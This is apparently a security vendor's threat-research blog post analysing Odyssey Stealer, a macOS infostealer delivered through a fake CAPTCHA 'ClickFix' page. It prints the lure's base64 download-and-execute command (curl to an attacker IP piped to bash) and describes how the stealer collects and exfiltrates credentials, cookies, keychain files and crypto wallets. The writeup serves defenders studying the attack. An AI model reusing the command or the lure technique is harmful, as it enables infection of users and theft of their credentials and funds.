Odyssey Stealer: ClickFix Malware Attacks macOS Users for Credentials and Crypto Wallet Details

A few months back, X-Labs released research on how a ClickFix attack delivered malware via Windows systems. Since then, the X-Labs researchers have been monitoring increased malware activity in the form of a phishing campaign that targets macOS via a ClickFix technique that delivers malware designed to steal credentials.

The attack is conducted using a ClickFix technique where the attacker builds a fake CAPTCHA verification page. This technique is a blend of phishing and social engineering that executes without dropping a binary on the system. The CAPTCHA verification can be crafted by attacker based on OS identification.

Odyssey Stealer technical analysis

On initially browsing the URL “hxxps://tradingviewen[.]com” on Windows and macOS systems, users are taken to a webpage where CAPTCHA verification is required and asks the user to perform several actions.

Webpage after browsing on Windows system:

Fig. 1 - Windows instructions
 

Webpage after browsing on macOS system

Fig. 2 - macOS instructions
 

On performing the required action and pasting content in a terminal, we get below code.

• echo "Y3VybCAtcyBodHRwOi8vNDUuMTQ2LjEzMC4xMzEvZC92aXB4MTQzNTAgfCBub2h1cCBiYXNoICY=" | base64 -d | bash

The Base64 in command resolves to an URL hosting malicious script.

• echo "curl -s hxxp://45.146.130[.]131/d/vipx14350 | nohup bash &" | base64 -d | bash

The URL “hxxp://45.146.130[.]131/d/vipx14350” hosts a highly obfuscated AppleScript. We will examine this AppleScript later in this post.

When we browse the actual URL “hxxps://tradingviewen[.]com” the webpage detects the user's operating system and displays tailored instructions for macOS or Windows. Below are commands shown when operations are performed on macOS and Windows.

1- On Windows, when user performs action win + R, typing PowerShell, clicking on copy, and performing paste (ctrl + v), it just pastes generic string windows command

2- On macOS, when user performs action with command + space, opening terminal, clicking copy, and pasting command on terminal, it pastes a malicious command which executes using bash.

Dissecting the AppleScript payload

When the command is being executed on the terminal, it asks the user to enter the user password for further actions, which results in gathering sensitive data from macOS devices and sending it to the remote server.

Upon downloading, an initial analysis of the script, we see it as an AppleScript compiled file (.scpt) that uses “osascript” to execute the AppleScript automatically. The script has randomly generated strings for obfuscation purposes making analysis tougher. However, upon cleaning the excess strings of the script, we were able to successfully analyse the behaviour of the code.

Initially, the script uses “mkdir” to create a directory, specifically within “/tmp” directory.

Fig. 3 - Beginning of script & creating directory
 

The main purpose of the script is to read browser extensions, crypto wallets, and to mine usernames and passwords. 

General file collection from Desktop and Documents

Below image shows file gathering from user’s Desktop and Documents folder based on extensions such as .txt, .pdf, .docx, .key and others.

In addition to these, the script also gathers Safari cookies, Apple notes and Keychain files.

Fig. 4 - File collection

Crypto wallet detection in Firefox and Chromium-based browser enumeration 

The script also targets browsers such as Firefox and Chrome for stealing cookies, saved logins, form history, encryption and encryption keys by copying it to the temporary working directory as shown in Fig. 5 and 6.

It also targets Chromium-based browsers such as Google Chrome, Brave, Microsoft Edge, Opera and others. It enumerates user profiles and extracts cookies, autofill data, login credentials and extension settings. The main thing to focus on Chromium-based browsers are the extensions matching known crypto wallets such as Electrum, Exodus, Litecoin, Wasabi and many more.

It scans their local storage and indexedDB directories which ensures any wallet related information stored is also exfiltrated. 

Fig. 5 - Firefox-based data collection

Fig. 6 - Chromium-based Chrome browser enumeration

The data exfiltration process

After gathering required information, the script sets up the exfiltration mechanism and packages everything into a  ZIP archive. The archive is then saved to /tmp/out.zip. The data function uploads archive to “hxxp://45.146.130[.]131/log” using a curl command.

Fig. 7 - Data exfiltration

When we try browsing the IP: 45.46.130[.]131 it takes us to login page of Odyssey stealer control panel, which attacker might access to view harvested data.

Fig. 8 - Odyssey stealer login page

Final cleanup after data exfiltration

After data has been sent to server, the script removes /tmp directory having zip file and working directory to remove traces of activity, making forensic analysis difficult. 

Conclusion

Through this blog post, we covered how the ClickFix attack evolved to switch attacking Windows machines to macOS ones. Through obfuscation techniques, attackers bypass traditional detection mechanisms with a terminal-based social engineering attack.

Here, we saw the attacker created a fake CAPTCHA webpage that checks for the OS before proper execution of the malware. When the correct OS is detected, the URL lures users to perform several instructions mentioned on the webpage and triggers the execution of malware. The execution takes place by following the command “base64 -d | bash”  which decodes base64-encoded code and runs on bash terminal. The base64-decoded code is link to malicious AppleScript (.scpt) which gathers sensitive information such as crypto wallet data, browser extensions, cookies, sessions, saved keychains, usernames, and passwords from the system. On successful capturing of data, it stores saved data in “/tmp/out.zip” and later exfiltrates the archive to its C2.

The takeaway from this technical analysis: Attackers use a blend of phishing and social engineering techniques to bypass common detection methods to exfiltrate data without the need to drop binaries in the system. 

Protection Statement

• Stage 2 (Lure) – Malicious URLs associated with these attacks are identified and blocked.
• Stage 5 (Dropper File) – Malicious AppleScript (.scpt) has been added to Forcepoint malicious database and are blocked.
• Stage 6 (Call Home) – C2 servers categorized under security category and blocked.
   

NGFW Protection Statement

The phishing site is detected with fingerprint "File-Text_Information-Stealer-Using-Fake-Browser-Dialogs" since dynup 1845. 

IOCs